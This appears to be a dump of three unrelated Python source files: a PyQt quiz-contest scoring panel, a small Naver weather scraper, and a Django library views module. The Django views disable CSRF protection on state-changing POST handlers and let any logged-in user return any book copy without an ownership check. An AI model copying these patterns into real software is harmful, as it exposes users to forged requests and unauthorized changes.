self.btnTeam5Add35 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam5Add35.setObjectName(_fromUtf8(\"btnTeam5Add35\"))\r\n self.gridLayout.addWidget(self.btnTeam5Add35, 4, 6, 1, 1)\r\n self.btnGradeList.append(self.btnTeam5Add35)\r\n self.btnTeam5AddX = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam5AddX.setObjectName(_fromUtf8(\"btnTeam5AddX\"))\r\n self.gridLayout.addWidget(self.btnTeam5AddX, 4, 8, 1, 1)\r\n self.btnGradeList.append(self.btnTeam5AddX)\r\n self.btnTeam5Add3 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam5Add3.setObjectName(_fromUtf8(\"btnTeam5Add3\"))\r\n self.gridLayout.addWidget(self.btnTeam5Add3, 4, 9, 1, 1)\r\n self.btnGradeList.append(self.btnTeam5Add3)\r\n # 队伍6\r\n self.btnTeam6Add10 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam6Add10.setObjectName(_fromUtf8(\"btnTeam6Add10\"))\r\n self.gridLayout.addWidget(self.btnTeam6Add10, 5, 1, 1, 1)\r\n self.btnGradeList.append(self.btnTeam6Add10)\r\n self.btnTeam6Add20 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam6Add20.setObjectName(_fromUtf8(\"btnTeam6Add20\"))\r\n self.gridLayout.addWidget(self.btnTeam6Add20, 5, 2, 1, 1)\r\n self.btnGradeList.append(self.btnTeam6Add20)\r\n self.btnTeam6Sub15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam6Sub15.setObjectName(_fromUtf8(\"btnTeam6Sub15\"))\r\n self.gridLayout.addWidget(self.btnTeam6Sub15, 5, 3, 1, 1)\r\n self.btnGradeList.append(self.btnTeam6Sub15)\r\n self.btnTeam6Add15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam6Add15.setObjectName(_fromUtf8(\"btnTeam6Add15\"))\r\n self.gridLayout.addWidget(self.btnTeam6Add15, 5, 4, 1, 1)\r\n self.btnGradeList.append(self.btnTeam6Add15)\r\n self.btnTeam6Add35 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam6Add35.setObjectName(_fromUtf8(\"btnTeam6Add35\"))\r\n self.gridLayout.addWidget(self.btnTeam6Add35, 5, 6, 1, 1)\r\n self.btnGradeList.append(self.btnTeam6Add35)\r\n self.btnTeam6Add25 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam6Add25.setObjectName(_fromUtf8(\"btnTeam6Add25\"))\r\n self.gridLayout.addWidget(self.btnTeam6Add25, 5, 5, 1, 1)\r\n self.btnGradeList.append(self.btnTeam6Add25)\r\n self.btnTeam6AddX = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam6AddX.setObjectName(_fromUtf8(\"btnTeam6AddX\"))\r\n self.gridLayout.addWidget(self.btnTeam6AddX, 5, 8, 1, 1)\r\n self.btnGradeList.append(self.btnTeam6AddX)\r\n self.btnTeam6Add3 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam6Add3.setObjectName(_fromUtf8(\"btnTeam6Add3\"))\r\n self.gridLayout.addWidget(self.btnTeam6Add3, 5, 9, 1, 1)\r\n self.btnGradeList.append(self.btnTeam6Add3)\r\n \r\n # 撤销按钮\r\n self.btnTeam1Undo = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam1Undo.setObjectName(_fromUtf8(\"btnTeam1Undo\"))\r\n self.gridLayout.addWidget(self.btnTeam1Undo, 0, 10, 1, 1)\r\n self.btnUndoList.append(self.btnTeam1Undo)\r\n self.btnTeam2Undo = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam2Undo.setObjectName(_fromUtf8(\"btnTeam2Undo\"))\r\n self.gridLayout.addWidget(self.btnTeam2Undo, 1, 10, 1, 1)\r\n self.btnUndoList.append(self.btnTeam2Undo)\r\n self.btnTeam3Undo = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam3Undo.setObjectName(_fromUtf8(\"btnTeam3Undo\"))\r\n self.gridLayout.addWidget(self.btnTeam3Undo, 2, 10, 1, 1)\r\n self.btnUndoList.append(self.btnTeam3Undo)\r\n self.btnTeam4Undo = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam4Undo.setObjectName(_fromUtf8(\"btnTeam4Undo\"))\r\n self.gridLayout.addWidget(self.btnTeam4Undo, 3, 10, 1, 1)\r\n self.btnUndoList.append(self.btnTeam4Undo)\r\n self.btnTeam5Undo = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam5Undo.setObjectName(_fromUtf8(\"btnTeam5Undo\"))\r\n self.gridLayout.addWidget(self.btnTeam5Undo, 4, 10, 1, 1)\r\n self.btnUndoList.append(self.btnTeam5Undo)\r\n self.btnTeam6Undo = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam6Undo.setObjectName(_fromUtf8(\"btnTeam6Undo\"))\r\n self.gridLayout.addWidget(self.btnTeam6Undo, 5, 10, 1, 1)\r\n self.btnUndoList.append(self.btnTeam6Undo)\r\n\r\n # 华丽的分割线\r\n self.line = QtGui.QFrame(Dialog)\r\n self.line.setGeometry(QtCore.QRect(0, 300, 1021, 16))\r\n self.line.setFrameShape(QtGui.QFrame.HLine)\r\n self.line.setFrameShadow(QtGui.QFrame.Sunken)\r\n self.line.setObjectName(_fromUtf8(\"line\"))\r\n self.line_2 = QtGui.QFrame(Dialog)\r\n self.line_2.setGeometry(QtCore.QRect(10, 90, 981, 20))\r\n self.line_2.setFrameShape(QtGui.QFrame.HLine)\r\n self.line_2.setFrameShadow(QtGui.QFrame.Sunken)\r\n self.line_2.setObjectName(_fromUtf8(\"line_2\"))\r\n self.line_3 = QtGui.QFrame(Dialog)\r\n self.line_3.setGeometry(QtCore.QRect(10, 130, 981, 20))\r\n self.line_3.setFrameShape(QtGui.QFrame.HLine)\r\n self.line_3.setFrameShadow(QtGui.QFrame.Sunken)\r\n self.line_3.setObjectName(_fromUtf8(\"line_3\"))\r\n self.line_4 = QtGui.QFrame(Dialog)\r\n self.line_4.setGeometry(QtCore.QRect(10, 170, 981, 20))\r\n self.line_4.setFrameShape(QtGui.QFrame.HLine)\r\n self.line_4.setFrameShadow(QtGui.QFrame.Sunken)\r\n self.line_4.setObjectName(_fromUtf8(\"line_4\"))\r\n self.line_5 = QtGui.QFrame(Dialog)\r\n self.line_5.setGeometry(QtCore.QRect(10, 210, 981, 20))\r\n self.line_5.setFrameShape(QtGui.QFrame.HLine)\r\n self.line_5.setFrameShadow(QtGui.QFrame.Sunken)\r\n self.line_5.setObjectName(_fromUtf8(\"line_5\"))\r\n self.line_6 = QtGui.QFrame(Dialog)\r\n self.line_6.setGeometry(QtCore.QRect(10, 250, 981, 20))\r\n self.line_6.setFrameShape(QtGui.QFrame.HLine)\r\n self.line_6.setFrameShadow(QtGui.QFrame.Sunken)\r\n self.line_6.setObjectName(_fromUtf8(\"line_6\"))\r\n self.line_7 = QtGui.QFrame(Dialog)\r\n self.line_7.setGeometry(QtCore.QRect(10, 290, 981, 20))\r\n self.line_7.setFrameShape(QtGui.QFrame.HLine)\r\n self.line_7.setFrameShadow(QtGui.QFrame.Sunken)\r\n self.line_7.setObjectName(_fromUtf8(\"line_7\"))\r\n self.line_1 = QtGui.QFrame(Dialog)\r\n self.line_1.setGeometry(QtCore.QRect(10, 50, 981, 20))\r\n self.line_1.setFrameShape(QtGui.QFrame.HLine)\r\n self.line_1.setFrameShadow(QtGui.QFrame.Sunken)\r\n self.line_1.setObjectName(_fromUtf8(\"line_1\"))\r\n self.line_9 = QtGui.QFrame(Dialog)\r\n self.line_9.setGeometry(QtCore.QRect(0, 440, 1011, 20))\r\n self.line_9.setFrameShape(QtGui.QFrame.HLine)\r\n self.line_9.setFrameShadow(QtGui.QFrame.Sunken)\r\n self.line_9.setObjectName(_fromUtf8(\"line_9\"))\r\n self.line_8 = QtGui.QFrame(Dialog)\r\n self.line_8.setGeometry(QtCore.QRect(110, 60, 21, 241))\r\n self.line_8.setFrameShape(QtGui.QFrame.VLine)\r\n self.line_8.setFrameShadow(QtGui.QFrame.Sunken)\r\n self.line_8.setObjectName(_fromUtf8(\"line_8\"))\r\n\r\n # 题目控制按钮\r\n self.comboboxChooseTeam = QtGui.QComboBox(Dialog)\r\n self.comboboxChooseTeam.setGeometry(QtCore.QRect(160, 330, 191, 23))\r\n self.comboboxChooseTeam.setObjectName(_fromUtf8(\"comboboxChooseTeam\"))\r\n self.btnNextQuestion = QtGui.QPushButton(Dialog)\r\n self.btnNextQuestion.setGeometry(QtCore.QRect(380, 330, 75, 23))\r\n self.btnNextQuestion.setObjectName(_fromUtf8(\"btnNextQuestion\"))\r\n # self.btnLastQuestion = QtGui.QPushButton(Dialog)\r\n # self.btnLastQuestion.setGeometry(QtCore.QRect(490, 330, 75, 23))\r\n # self.btnLastQuestion.setObjectName(_fromUtf8(\"btnLastQuestion\"))\r\n\r\n # 暂停时间按钮\r\n self.btnTimePause = QtGui.QPushButton(Dialog)\r\n self.btnTimePause.setGeometry(QtCore.QRect(600, 330, 75, 23))\r\n self.btnTimePause.setObjectName(_fromUtf8(\"btnTimePause\"))\r\n\r\n # 更新按钮\r\n self.btnRefreshAnswer = QtGui.QPushButton(Dialog)\r\n self.btnRefreshAnswer.setGeometry(QtCore.QRect(160, 470, 171, 23))\r\n self.btnRefreshAnswer.setObjectName(_fromUtf8(\"btnRefreshAnswer\"))\r\n self.btnRefreshGrade = QtGui.QPushButton(Dialog)\r\n self.btnRefreshGrade.setGeometry(QtCore.QRect(380, 470, 171, 23))\r\n self.btnRefreshGrade.setObjectName(_fromUtf8(\"btnRefreshGrade\"))\r\n self.btnHide = QtGui.QPushButton(Dialog)\r\n self.btnHide.setGeometry(QtCore.QRect(600, 470, 171, 23))\r\n self.btnHide.setObjectName(_fromUtf8(\"btnHide\"))\r\n\r\n # 退出按钮\r\n self.btnQuit = QtGui.QPushButton(Dialog)\r\n self.btnQuit.setGeometry(QtCore.QRect(800, 470, 171, 23))\r\n self.btnQuit.setObjectName(_fromUtf8(\"btnQuit\"))\r\n\r\n self.retranslateUi(Dialog)\r\n # QtCore.QMetaObject.connectSlotsByName(Dialog)\r\n\r\n def retranslateUi(self, Dialog):\r\n\r\n # 初始化显示文本\r\n self.labelTeam2.setText(_translate(\"Dialog\", \"2-\", None))\r\n self.labelTeam6.setText(_translate(\"Dialog\", \"6-\", None))\r\n self.labelTeam4.setText(_translate(\"Dialog\", \"4-\", None))\r\n self.labelTeam5.setText(_translate(\"Dialog\", \"5-\", None))\r\n self.labelTeam3.setText(_translate(\"Dialog\", \"3-\", None))\r\n self.labelTeam1.setText(_translate(\"Dialog\", \"1-\", None))\r\n self.labelTeam.setText(_translate(\"Dialog\", \"队伍\", None))\r\n self.labelGrade.setText(_translate(\"Dialog\", \"当前分数\", None))\r\n self.labelGradePart1.setText(_translate(\"Dialog\", \"Part I\", None))\r\n self.labelGradePart2.setText(_translate(\"Dialog\", \"Part II\", None))\r\n self.labelGradeControl.setText(_translate(\"Dialog\", \"分数控制\", None))\r\n self.labelGradePart3.setText(_translate(\"Dialog\", \"Part III\", None))\r\n self.labelGradePart4.setText(_translate(\"Dialog\", \"Part IV\", None))\r\n self.btnTeam1Undo.setText(_translate(\"Dialog\", \"撤销\", None))\r\n self.btnTeam1Add3.setText(_translate(\"Dialog\", \"+3\", None))\r\n self.btnTeam6Sub15.setText(_translate(\"Dialog\", \"-15\", None))\r\n self.btnTeam6Add20.setText(_translate(\"Dialog\", \"+20\", None))\r\n self.btnTeam1Add20.setText(_translate(\"Dialog\", \"+20\", None))\r\n self.btnTeam6Add15.setText(_translate(\"Dialog\", \"+15\", None))\r\n self.btnTeam6Add10.setText(_translate(\"Dialog\", \"+10\", None))\r\n self.btnTeam2Add20.setText(_translate(\"Dialog\", \"+20\", None))\r\n self.btnTeam4Add35.setText(_translate(\"Dialog\", \"+35\", None))\r\n self.btnTeam2Add15.setText(_translate(\"Dialog\", \"+15\", None))\r\n self.btnTeam5Sub15.setText(_translate(\"Dialog\", \"-15\", None))\r\n self.btnTeam1Add10.setText(_translate(\"Dialog\", \"+10\", None))\r\n self.btnTeam5Add35.setText(_translate(\"Dialog\", \"+35\", None))\r\n self.btnTeam2AddX.setText(_translate(\"Dialog\", \"+0\", None))\r\n self.btnTeam3AddX.setText(_translate(\"Dialog\", \"+0\", None))\r\n self.btnTeam4AddX.setText(_translate(\"Dialog\", \"+0\", None))\r\n self.btnTeam5AddX.setText(_translate(\"Dialog\", \"+0\", None))\r\n self.btnTeam6AddX.setText(_translate(\"Dialog\", \"+0\", None))\r\n self.btnTeam2Add3.setText(_translate(\"Dialog\", \"+3\", None))\r\n self.btnTeam3Add3.setText(_translate(\"Dialog\", \"+3\", None))\r\n self.btnTeam4Add3.setText(_translate(\"Dialog\", \"+3\", None))\r\n self.btnTeam5Add3.setText(_translate(\"Dialog\", \"+3\", None))\r\n self.btnTeam6Add3.setText(_translate(\"Dialog\", \"+3\", None))\r\n self.btnTeam2Undo.setText(_translate(\"Dialog\", \"撤销\", None))\r\n self.btnTeam3Undo.setText(_translate(\"Dialog\", \"撤销\", None))\r\n self.btnTeam4Undo.setText(_translate(\"Dialog\", \"撤销\", None))\r\n self.btnTeam5Undo.setText(_translate(\"Dialog\", \"撤销\", None))\r\n self.btnTeam6Undo.setText(_translate(\"Dialog\", \"撤销\", None))\r\n self.btnTeam1Add25.setText(_translate(\"Dialog\", \"+25\", None))\r\n self.btnTeam4Add15.setText(_translate(\"Dialog\", \"+15\", None))\r\n self.btnTeam1Sub15.setText(_translate(\"Dialog\", \"-15\", None))\r\n self.btnTeam5Add20.setText(_translate(\"Dialog\", \"+20\", None))\r\n self.btnTeam1Add15.setText(_translate(\"Dialog\", \"+15\", None))\r\n self.btnTeam1Add35.setText(_translate(\"Dialog\", \"+35\", None))\r\n self.btnTeam3Add20.setText(_translate(\"Dialog\", \"+20\", None))\r\n self.btnTeam3Sub15.setText(_translate(\"Dialog\", \"-15\", None))\r\n self.btnTeam5Add10.setText(_translate(\"Dialog\", \"+10\", None))\r\n self.btnTeam1AddX.setText(_translate(\"Dialog\", \"+0\", None))\r\n self.btnTeam5Add15.setText(_translate(\"Dialog\", \"+15\", None))\r\n self.btnTeam4Add10.setText(_translate(\"Dialog\", \"+10\", None))\r\n self.btnTeam6Add35.setText(_translate(\"Dialog\", \"+35\", None))\r\n self.btnTeam2Add10.setText(_translate(\"Dialog\", \"+10\", None))\r\n self.btnTeam2Add25.setText(_translate(\"Dialog\", \"+25\", None))\r\n self.btnTeam3Add10.setText(_translate(\"Dialog\", \"+10\", None))\r\n self.btnTeam4Sub15.setText(_translate(\"Dialog\", \"-15\", None))\r\n self.btnTeam4Add20.setText(_translate(\"Dialog\", \"+20\", None))\r\n self.btnTeam2Add35.setText(_translate(\"Dialog\", \"+35\", None))\r\n self.btnTeam3Add15.setText(_translate(\"Dialog\", \"+15\", None))\r\n self.btnTeam5Add25.setText(_translate(\"Dialog\", \"+25\", None))\r\n self.btnTeam3Add25.setText(_translate(\"Dialog\", \"+25\", None))\r\n self.btnTeam4Add25.setText(_translate(\"Dialog\", \"+25\", None))\r\n self.btnTeam6Add25.setText(_translate(\"Dialog\", \"+25\", None))\r\n self.btnTeam2Sub15.setText(_translate(\"Dialog\", \"-15\", None))\r\n self.btnTeam3Add35.setText(_translate(\"Dialog\", \"+35\", None))\r\n self.labelChooseTeam.setText(_translate(\"Dialog\", \"题目控制\", None))\r\n self.labelShowControl.setText(_translate(\"Dialog\", \"展示更新\", None))\r\n # self.comboboxChooseTeam.setText(_translate(\"Dialog\", \"全部\", None))\r\n self.btnNextQuestion.setText(_translate(\"Dialog\", \"下一题\", None))\r\n # self.btnLastQuestion.setText(_translate(\"Dialog\", \"上一题\", None))\r\n self.btnTimePause.setText(_translate(\"Dialog\", \"时间暂停\", None))\r\n self.btnRefreshAnswer.setText(_translate(\"Dialog\", \"更新答题情况\", None))\r\n self.btnRefreshGrade.setText(_translate(\"Dialog\", \"更新分数\", None))\r\n self.btnHide.setText(_translate(\"Dialog\", \"隐藏选项\", None))\r\n self.btnQuit.setText(_translate(\"Dialog\", \"退出\", None))\r\n\r\n # 初始化队伍名称\r\n tid = 1\r\n for (label,team) in zip(self.labelTeamList, listTeamName):\r\n label.setText('%d-%s' % (tid, team)) \r\n tid += 1\r\n\r\n # 初始化分数\r\n for (edit,grade) in zip(self.editGradeList, listGrade):\r\n edit.setText(str(grade))\r\n edit.setValidator(QtGui.QIntValidator(edit))\r\n edit.setMaxLength(4)\r\n edit.textChanged.connect(self.updateGrade)\r\n\r\n # 初始化自定义分数输入框\r\n for edit in self.editGradeXList:\r\n edit.setText('0')\r\n edit.setValidator(QtGui.QIntValidator(edit))\r\n edit.setMaxLength(3)\r\n edit.textChanged.connect(self.createGradeX)\r\n\r\n # 分数控制按钮绑定\r\n for btn in self.btnGradeList:\r\n btn.clicked.connect(self.changeGrade)\r\n\r\n # 撤销按钮绑定\r\n for btn in self.btnUndoList:\r\n btn.setEnabled(False)\r\n btn.clicked.connect(self.undoGrade)\r\n\r\n # 下一题按钮绑定\r\n self.btnNextQuestion.clicked.connect(self.sendNextQuestion)\r\n\r\n # 上一题按钮绑定\r\n # self.btnLastQuestion.clicked.connect(self.sendLastQuestion)\r\n\r\n # 时间暂停按钮绑定\r\n self.btnTimePause.clicked.connect(self.timePause)\r\n\r\n # 更新答题情况按钮绑定\r\n self.btnRefreshAnswer.clicked.connect(self.refreshAnswerLabel)\r\n\r\n # 更新分数按钮绑定\r\n self.btnRefreshGrade.clicked.connect(self.r.refRank)\r\n\r\n # 隐藏选项按钮绑定\r\n self.btnHide.clicked.connect(self.hideSelection)\r\n\r\n # 退出按钮绑定\r\n self.btnQuit.clicked.connect(Dialog.close)\r\n \r\n\r\n # 初始化队伍选择按钮\r\n self.comboboxChooseTeam.addItem(_translate(\"Dialog\", \"全部\", None))\r\n self.comboboxChooseTeam.addItem(_translate(\"Dialog\", \"队伍1-建筑学院\", None))\r\n self.comboboxChooseTeam.addItem(_translate(\"Dialog\", \"队伍2-机械学院\", None))\r\n self.comboboxChooseTeam.addItem(_translate(\"Dialog\", \"队伍3-信息学院\", None))\r\n self.comboboxChooseTeam.addItem(_translate(\"Dialog\", \"队伍4-自动化学院\", None))\r\n self.comboboxChooseTeam.addItem(_translate(\"Dialog\", \"队伍5-仪科学院\", None))\r\n self.comboboxChooseTeam.addItem(_translate(\"Dialog\", \"队伍6-吴健雄学院\", None))\r\n self.comboboxChooseTeam.activated.connect(self.changeTeam)\r\n\r\n\r\n # 更新显示板的信息\r\n def displayInfo(self):\r\n QtGui.QMessageBox.information(Dialog, \"Fortune Client\",\r\n \"The host was not found. Please check the host name and \"\r\n \"port settings.\")\r\n\r\n # 分数控制按钮按下的回调函数,修改分数显示框的分数\r\n def changeGrade(self):\r\n sender = Dialog.sender()\r\n teamNum = sender.objectName()[7]\r\n editTeam = self.editGradeList[int(teamNum)-1]\r\n change = int(sender.text()[1:])\r\n grade = int(editTeam.text())\r\n if sender.text()[0] == '+':\r\n editTeam.setText(str(grade+change))\r\n else:\r\n editTeam.setText(str(grade-change))\r\n\r\n # 撤销按钮的回调函数,撤销分数的修改(只能撤销一次)\r\n def undoGrade(self):\r\n sender = Dialog.sender()\r\n team = int(sender.objectName()[7]) - 1\r\n self.editGradeList[team].setText(gradeTeamList[team][-2])\r\n sender.setEnabled(False)\r\n\r\n # 自定义分数框的回调函数,产生自定义分数\r\n def createGradeX(self):\r\n sender = Dialog.sender()\r\n team = sender.objectName()[8]\r\n index = 6+8*(int(team)-1)\r\n self.btnGradeList[index].setText('+' + sender.text())\r\n\r\n # 队伍选择下拉框的回调函数,选择发送的客户端\r\n def changeTeam(self, index):\r\n global teamId\r\n teamId = index\r\n \r\n # 分数显示框的回调函数,更新分数到数据库\r\n def updateGrade(self):\r\n sender = Dialog.sender()\r\n team = int(sender.objectName()[8]) - 1\r\n self.btnUndoList[team].setEnabled(True)\r\n grade = self.editGradeList[team].text()\r\n gradeTeamList[team].append(grade) # 用列表记录分数,撤销用\r\n mdb.updateScore(team+1,grade) # 更新分数到数据库\r\n\r\n # 发送下一题按钮的回调函数,发送下一题\r\n def sendNextQuestion(self):\r\n global nextQuestionId, currentQuestionId, teamId\r\n nextQuestionId = mdb.getNextQuestionId()\r\n send = str(nextQuestionId) + ',' + ','.join([str(g[1]) for g in mdb.getAllGrade()])\r\n if int(teamId) == 0:\r\n for client in clientDict.values():\r\n client.write(QtCore.QByteArray(str(send)))\r\n self.d.appendInfo('server send question%s to all clients' % (nextQuestionId)) \r\n else:\r\n for client in clientDict.values():\r\n if client.id == str(teamId):\r\n client.write(QtCore.QByteArray(str(send)))\r\n self.d.appendInfo('server send question%s to client%s' % (nextQuestionId, client.id))\r\n if client.id == '999':\r\n client.write(QtCore.QByteArray(send))\r\n elif client.id == '998':\r\n client.write(QtCore.QByteArray(send))\r\n currentQuestionId = int(nextQuestionId)\r\n\r\n def sendLastQuestion(self):\r\n pass\r\n \r\n # 时间暂停(恢复)按钮的回调函数,暂定计时\r\n def timePause(self):\r\n global timePause\r\n global teamId\r\n if not timePause:\r\n send = 'stop'\r\n timePause = True\r\n else:\r\n send = 'restart'\r\n timePause = False\r\n if teamId == 0:\r\n for client in clientDict.values():\r\n client.write(QtCore.QByteArray(send))\r\n self.d.appendInfo('server send %s to all clients' % send) \r\n else:\r\n for client in clientDict.values():\r\n if client.id == str(teamId):\r\n client.write(QtCore.QByteArray(send))\r\n self.d.appendInfo('server send %s to client%s' % (send, client.id))\r\n if client.id == '999':\r\n client.write(QtCore.QByteArray(send))\r\n elif client.id == '998':\r\n client.write(QtCore.QByteArray(send))\r\n text = self.btnTimePause.text()\r\n if text == _translate(\"Dialog\", \"时间暂停\", None):\r\n self.btnTimePause.setText(_translate(\"Dialog\", \"取消暂停\", None))\r\n else:\r\n self.btnTimePause.setText(_translate(\"Dialog\", \"时间暂停\", None))\r\n\r\n # 更新答题情况按钮的回调函数,更新答题情况\r\n def refreshAnswerLabel(self):\r\n global currentQuestionId, answerList, teamId\r\n if currentQuestionId <= 20: #题目超过n个会转为针对某个队伍进行更新,所以这里是决定共同必答题数量的地方\r\n self.r.refAll(currentQuestionId, mdb.getAnswerlog(currentQuestionId))\r\n # if currentQuestionId == 20:\r\n # \tif isClearJudge:\r\n # \t\tself.r.clearJudge()\r\n # \tisClearJudge = True\r\n\r\n else:\r\n self.r.clearJudge()\r\n self.r.refOne(currentQuestionId, int(teamId)-1, mdb.getTeamlog(currentQuestionId, teamId))\r\n self.r.refRank()\r\n # self.r.clearJudge()\r\n\r\n # 隐藏选项按钮的回调函数\r\n def hideSelection(self):\r\n global hideSelection\r\n if not hideSelection:\r\n self.btnHide.setText(_translate(\"Dialog\", \"隐藏选项\", None))\r\n self.r.removeSelect()\r\n else:\r\n self.r.showSelect()\r\n self.btnHide.setText(_translate(\"Dialog\", \"恢复显示\", None))\r\n hideSelection = not hideSelection\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtGui.QApplication(sys.argv)\r\n Dialog = QtGui.QDialog()\r\n ui = ControlModule(Dialog)\r\n Dialog.show()\r\n sys.exit(app.exec_())\r\n\r\n","sub_path":"beta2.0/server/Ui_ControlModule.py","file_name":"Ui_ControlModule.py","file_ext":"py","file_size_in_byte":46032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"259426352","text":"# regularEx.py\n# regular expression 에 관한 예제\n\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\n\nhtml = urlopen(\"http://weather.naver.com/rgn/townWetr.nhn?naverRgnCd=09680531\")\nbsObj = BeautifulSoup(html, \"html.parser\")\npmList = bsObj.findAll(\"dt\")\nprint (pmList)\nfor pm in pmList: \n airQuality = pm.get_text(strip=True)\n print (\"1\"+airQuality)\n\n airQuality = re.sub(r'\\(.*?\\)','',airQuality) # (31~88)과 같은 텍스트를 제거. \\(.*?\\) 패턴에 맞는 것은 ''로 substitue\n print (\"2\" + airQuality)\n\n match_air = re.findall(r'[\\d.]+', airQuality) # 숫자 만 추출 \n print (\"3\", match_air)\n\n match_air = str(match_air[0])\n print (\"4\", match_air)\n\n# +++++++++++++++++++++++++++++++++++++++++++\n# pmList = bsObj.findAll(\"dt\")\n# [
미세먼지 35㎍/㎥보통(31~80)
, \n#
오존 0.037ppm보통(0.041~0.080)
, \n#
통합대기 61보통(51~100)
]\n\n# airQuality = pm.get_text(strip=True)\n# 미세먼지35㎍/㎥보통(31~80)\n# 오존0.037ppm보통(0.041~0.080)\n# 통합대기61보통(51~100)\n\n# airQuality = re.sub(r'\\(.*?\\)','',airQuality)\n# 미세먼지35㎍/㎥보통\n# 오존0.037ppm보통\n# 통합대기61보통\n\n# match_air = re.findall(r'[\\d.]+', airQuality)\n# ['35']\n# ['0.037']\n# ['61']","sub_path":"regularEx.py","file_name":"regularEx.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"361786271","text":"from django.shortcuts import render,redirect\nfrom django.shortcuts import get_object_or_404\nfrom store.models import *\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.models import User\nfrom datetime import date\nfrom decimal import Decimal\n\n# Create your views here.\n\ndef index(request):\n return render(request, 'store/index.html')\n\ndef bookDetailView(request, bid):\n template_name = 'store/book_detail.html'\n \n book = get_object_or_404(Book,id=bid)\n num = BookCopy.objects.filter(book__title=book.title,status=True).count()\n\n if(request.user.is_authenticated):\n user = User.objects.get(username = request.user.username)\n ratingofuser = rating.objects.filter(book = book,user = user).count()\n if(ratingofuser>0):\n rate = rating.objects.get(book = book,user = user).rate\n else:\n rate = 0.0\n else:\n rate = 0.0 \n if num==0:\n context = {\n 'book': book, # set this to an instance of the required book\n 'num_available': 'Sorry Book not available', # set this to the number of copies of the book available, or 0 if the book isn't available\n 'rate': rate,\n }\n else:\n context = {\n 'book': book,\n 'num_available': num,\n 'rate': rate,\n }\n # START YOUR CODE HERE\n \n return render(request, template_name, context=context)\n\n\n@csrf_exempt\ndef bookListView(request):\n template_name = 'store/book_list.html'\n\n title = request.GET.get(\"title\")\n author = request.GET.get(\"author\")\n genre = request.GET.get(\"genre\")\n if(title and author and genre):\n books = Book.objects.filter(title=title,author=author,genre=genre)\n elif(title and author):\n books = Book.objects.filter(title=title,author=author)\n elif(title and genre):\n books = Book.objects.filter(title=title,genre=genre)\n elif(author and genre):\n books = Book.objects.filter(author=author,genre=genre)\n elif(title):\n books = Book.objects.filter(title=title)\n elif(author):\n books = Book.objects.filter(author=author)\n elif(genre):\n books = Book.objects.filter(genre=genre)\n else:\n books = Book.objects.all()\n\n context = {\n 'books': books, # set this to the list of required books upon filtering using the GET parameters\n # (i.e. the book search feature will also be implemented in this view)\n }\n\n return render(request, template_name, context=context)\n\n@login_required\ndef viewLoanedBooks(request):\n template_name = 'store/loaned_books.html'\n '''\n The above key 'books' in the context dictionary should contain a list of instances of the \n BookCopy model. Only those book copies should be included which have been loaned by the user.\n '''\n # START YOUR CODE HERE\n user = User.objects.get(username = request.user.username)\n books = BookCopy.objects.filter(borrower = user)\n context = {\n 'books': books,\n }\n\n return render(request, template_name, context=context)\n\n@csrf_exempt\n@login_required\ndef loanBookView(request):\n '''\n Check if an instance of the asked book is available.\n If yes, then set the message to 'success', otherwise 'failure'\n '''\n # START YOUR CODE HERE\n book_id = request.POST.get(\"bid\") # get the book id from post data\n book = Book.objects.get(id=book_id)\n bookcopy = BookCopy.objects.filter(book__title=book.title,status=True).first()\n Numberofbooks = BookCopy.objects.filter(book__title=book.title,status=True).count()\n \n if(Numberofbooks != 0):\n user = User.objects.get(username = request.user.username)\n bookcopy.borrower = user\n bookcopy.status = False\n bookcopy.borrow_date = date.today()\n bookcopy.save()\n response_data = {\n 'message': 'success',\n }\n else:\n response_data = {\n 'message': 'failure',\n }\n \n\n return JsonResponse(response_data)\n\n'''\nFILL IN THE BELOW VIEW BY YOURSELF.\nThis view will return the issued book.\nYou need to accept the book id as argument from a post request.\nYou additionally need to complete the returnBook function in the loaned_books.html file\nto make this feature complete\n''' \n@csrf_exempt\n@login_required\ndef returnBookView(request):\n book_id = request.POST.get('bid')\n print(book_id)\n book = BookCopy.objects.get(id=book_id)\n user = User.objects.get(username = request.user.username)\n if(book!=0):\n book.borrower = None\n book.status = True\n book.borrow_date = None\n book.save()\n response_data = {\n 'message': 'success',\n }\n else:\n response_data = {\n 'message': 'failure',\n }\n\n return JsonResponse(response_data)\n\n\n@csrf_exempt\n@login_required\ndef ratingsystem(request):\n if request.method == 'POST':\n rate = request.POST.get('rate')\n bid = request.POST.get('bid')\n book = Book.objects.get(id = bid)\n user = User.objects.get(username = request.user.username)\n rateuser = rating()\n rateuser.user = user\n rateuser.rate = rate\n rateuser.book = book\n availableRateUser = rating.objects.filter(book=book,user=user)\n availableRateUser.delete()\n rateuser.save()\n\n bookRate = rating.objects.filter(book = book)\n sum = 0\n for i in bookRate:\n sum = sum + i.rate\n totalrate = sum/bookRate.count()\n x = Decimal(totalrate)\n rate = round(x,2)\n book.rating = rate\n book.save()\n response_data = {\n 'message': 'success',\n }\n return JsonResponse(response_data)\n","sub_path":"store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} 